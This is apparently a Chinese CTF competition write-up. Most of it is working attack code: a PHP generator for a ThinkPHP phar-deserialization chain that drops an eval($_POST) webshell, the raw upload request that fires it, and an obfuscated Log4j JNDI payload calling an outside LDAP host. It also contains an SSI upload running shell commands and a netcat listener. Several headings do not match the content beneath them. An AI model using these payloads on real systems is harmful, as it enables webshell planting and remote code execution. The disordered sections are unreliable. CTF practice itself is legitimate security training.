乐态思 发表于 2022-1-12 16:55:39
长安“战疫”网络安全赛-wp



Web

tp

文件上传+phar反序列化
<?php
// Generator for the phar-deserialization gadget chain described in this write-up,
// reproduced from the forum paste with the listing numbers and mid-line wraps removed
// (no code tokens changed). Each constructor only wires one gadget object into the
// next; the comments give the class each property is expected to hold.
// Defender's note: the write-up triggers the chain by supplying a `phar://` path as
// FILES[file][tmp_name] in the upload request below — on the PHP versions this
// targets, phar metadata is unserialized as soon as the archive is opened, so any
// filesystem call on an attacker-controlled path is an unserialize() sink.
namespace think\process\pipes {
    class Windows {
        private $files = [];

        public function __construct($files)
        {
            // $files => a new instance of a think\Model subclass (new Pivot()); Model itself is abstract
            $this->files = [$files];
        }
    }
}

namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
            // $this->parent => think\console\Output
            $this->parent = $output;
            // causes getError() to be called, which returns $this->error
            $this->append = array("xxx"=>"getError");
            // $this->error must be a Relation subclass that is also a OneToOne subclass => HasOne
            $this->error = $modelRelation;
        }
    }
}

namespace think\model{
    use think\Model;

    // Concrete Model subclass; this is the object stored in Windows::$files.
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}

namespace think\model\relation{
    // Concrete OneToOne subclass; this is the object stored in Model::$error.
    class HasOne extends OneToOne {
    }
}

namespace think\model\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;

        function __construct($query)
        {
            $this->selfRelation = 0;
            // $query points to the Query object
            $this->query = $query;
            // the $value element, used as the second argument referenced by the call
            $this->bindAttr = ['xxx'];
        }
    }
}

namespace think\db {
    class Query {
        protected $model;

        function __construct($model)
        {
            // $this->model => think\console\Output
            $this->model = $model;
        }
    }
}

namespace think\console{
    class Output{
        private $handle;
        protected $styles;

        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            // $handle -> think\session\driver\Memcached
            $this->handle = $handle;
        }
    }
}

namespace think\session\driver {
    class Memcached
    {
        protected $handler;

        function __construct($handle)
        {
            // $handle -> think\cache\driver\File
            $this->handler = $handle;
        }
    }
}

namespace think\cache\driver {
    class File
    {
        protected $options = null;
        protected $tag;

        function __construct(){
            $this->options = [
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                // cache 'path' is a php://filter chain that base64-decodes the embedded
                // payload into public/a.php when the cache driver writes (the 写shell step)
                'path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../public/a.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }
    }
}

namespace {
    // Assemble the chain from the innermost gadget outwards.
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));

    // Print the serialized chain, plain and base64-encoded.
    echo serialize($window);
    echo base64_encode(serialize($window));

    // the file extension must be .phar at creation time
    $phar = new Phar("exp.phar");
    $phar->startBuffering();
    $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
    // $object = new Windows();
    // store the crafted object as the meta-data in the manifest
    $phar->setMetadata($window);
    // add a file to the archive
    $phar->addFromString("1.php", "");
    // the signature is computed automatically
    $phar->stopBuffering();
    rename("exp.phar", "exp1.jpg");
}
写shell

shiro?

log4j rce
  1. POST /public/index.php/index/index/upload?FILES[file]
  2. [name]=phar://suanve&FILES[file][tmp_name]=phar://suanve HTTP/1.1
  3. Host: a6080904.lxctf.net
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
  5. Gecko/20100101 Firefox/83.0
  6. Accept:
  7. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w
  8. ebp,*/*;q=0.8
  9. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enUS;q=0.3,en;q=0.2
  10. Accept-Encoding: gzip, deflate
  11. Content-Type: multipart/form-data; boundary=--------------------------
  12. -139087197228008034012754605521
  13. Content-Length: 1199
  14. Connection: close
  15. Upgrade-Insecure-Requests: 1
  16. -----------------------------139087197228008034012754605521
  17. Content-Disposition: form-data; name="file"; filename="suanve"
  18. Content-Type: image/jpeg
  19. GIF89a<?php __HALT_COMPILER(); ?>
  20. �QO:27:"think\process\pipes\Windows":1:
  21. {s:34:"think\process\pipes\Windowsfiles";a:1:
  22. {i:0;O:17:"think\model\Pivot":3:{s:9:"*append";a:1:
  23. {s:3:"xxx";s:8:"getError";}s:8:"*error";O:27:"think\model\relation\HasOn
  24. e":3:{s:15:"*selfRelation";i:0;s:11:"*bindAttr";a:1:
  25. {i:0;s:3:"xxx";}s:8:"*query";O:14:"think\db\Query":1:
  26. {s:8:"*model";O:20:"think\console\Output":2:
  27. {s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached"
  28. :1:{s:10:"*handler";O:23:"think\cache\driver\File":2:
  29. {s:10:"*options";a:5:
  30. {s:6:"expire";i:3600;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"pa
  31. th";s:129:"php://filter/convert.iconv.utf-8.utf-7|convert.base64-
  32. decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../public/a.
  33. php";s:13:"data_compress";b:0;}s:6:"*tag";s:3:"xxx";}}s:9:"*styles";a:1:
  34. {i:0;s:7:"getAttr";}}}}s:6:"parent";r:11;}}}1.phpQ;�a���~x�|
  35. ��ϕ*�,m�8GBMB
  36. -----------------------------139087197228008034012754605521--

curl 外带flag

Baby_Upload

发现 shtml 可以上传,但过滤了一堆命令,flag 也不能出现在内容里;不过可以通过打包来绕过。
  1. ${j${uhns:fnYS:-n}${c:yShJJV:msiqQ:BR:UKUHc:-
  2. d}i${CWnHLQ:O:CadPOP:-:}ld${QaaVd:pRdN:cMAUxW:dGUA:zF:-a}${bwWku:-
  3. p}:${dSVAq:HI:fqOXJY:lnmA:tw:-/}${LJsI:OHhD:mgE:L:KKqM:-/}${cqkdfC:Whgbs
  4. z:YHDJLV:-1}2${v:mJhJs:Ky:extESK:bpme:-3}.${GF:OvQTw:MtHR:I:-5}${hFWk:-7
  5. }${b:l:-.}${d:q:N:njP:-7}${pifPa:cxNupk:Rduy:mJeGR:-8}.${KV:-1}68:1${zOC
  6. b:lOlhLw:QsYntQ:-3}8${xXo:BknON:-9}${QQGNH:IsHHM:-/}${DG:jGiGp:LIbk:s:Gl
  7. :-o}${gk:jxlXtq:HIO:dlmdop:-=}to${uq:tkzn:J:-m}${BEB:yT:xY:Jfl:-c}at}


flag{c62e7f0dd42546cc9a13b167d184cc3b}
flag配送中心



其中 Origin 部分即为我服务器的 IP。在其他地方启动一个可以正常使用的 HTTP 代理,如 http://..122.65:8888/,并附带 proxy:http://..122.65:8888/;再次访问 http://your-ip:8080/index.php,此时的 Origin 已经变成 *.*122.65,也就是说我们甚至可以伪造数据。在服务器下新建一个 b.txt,里面内容为:
  1. POST / HTTP/1.1
  2. Host: 8a5ef041.lxctf.net
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
  4. Gecko/20100101 Firefox/83.0
  5. Accept:
  6. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w
  7. ebp,*/*;q=0.8
  8. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enUS;q=0.3,en;q=0.2
  9. Accept-Encoding: gzip, deflate
  10. Content-Type: multipart/form-data; boundary=--------------------------
  11. -23603960162831012392270557328
  12. Content-Length: 654
  13. Origin: http://8a5ef041.lxctf.net
  14. Connection: close
  15. Referer: http://8a5ef041.lxctf.net/
  16. Upgrade-Insecure-Requests: 1
  17. -----------------------------23603960162831012392270557328
  18. Content-Disposition: form-data; name="file_upload"; filename="1.shtml
  19. Content-Type: application/octet-stream
  20. <!--#exec cmd="dir /"-->
  21. <!--#exec cmd="tar cvf
  22. /var/www/html/upload/d7efaae655f6177619403045edc9ae32/2.tar / --
  23. exclude=/bin --exclude=app --exclude=home --exclude=root --exclude=run -
  24. -exclude=lib --exclude=sys --exclude=tmp --exclude=usr --exclude=var --
  25. exclude=mnt --exclude=opt --exclude=etc --exclude=dev --exclude=boot --
  26. exclude=bin --exclude=proc --exclude=sbin --exclude=sys --exclude=mnt
  27. --exclude=media"-->
  28. -----------------------------23603960162831012392270557328--

开启监听:nc -lvvp 1234
